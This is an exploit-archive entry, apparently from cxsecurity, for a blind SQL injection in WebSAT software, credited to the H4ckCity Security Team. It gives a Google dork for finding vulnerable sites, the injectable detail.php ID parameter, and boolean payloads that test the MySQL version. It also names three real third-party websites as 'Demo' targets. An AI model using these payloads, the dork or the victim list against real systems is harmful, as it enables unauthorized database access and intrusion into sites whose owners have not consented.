WebSAT Blind SQL Injection

2012.01.02
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

############################################################################ # Exploit Title: WebSAT Blind SQL Injection Vulnerabilitiy # Google Dork: "powered by WebSAT" # Date: 1/1/2012 # Author: H4ckCity Security Team # Discovered By: farbodmahini # Home: WwW.H4ckCity.Org # Software Link: www.off-ice.com.au # Version: All Version # Category:: webapps # Security Risk:: High # Tested on: GNU/Linux Ubuntu - Windows Server - win7 ############################################################################ # Exploit: # # # http://www.target.com/detail.php?ID=1 [Blind SQL] # # # Test Blind SQL Injection in MYSQL Version 5: # # # True # # http://www.target.com/detail.php?ID=1 and substring(@@version,1,1)=5-- # # False # # http://www.target.com/detail.php?ID=1 and substring(@@version,1,1)=4-- # # Demo: # # http://egb.net.au/detail.php?ID=1 [Blind SQL] # http://www.nostalgicautoparts.com.au/detail.php?ID=1 [Blind SQL] # http://www.malenycheese.com.au/detail.php?ID=1 [Blind SQL] # # ############################################################################ # Special Thanks : Mehdi.H4ckcity-2MzRp-Mikili-M.Prince-Bl4ck.Viper-iC0d3R- # IrIsT-K0242-P0W3RFU7-Mr.M4st3r-Higher_Sense ,... ############################################################################ GreetZ : All H4ckCity Member - BHG Members ############################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top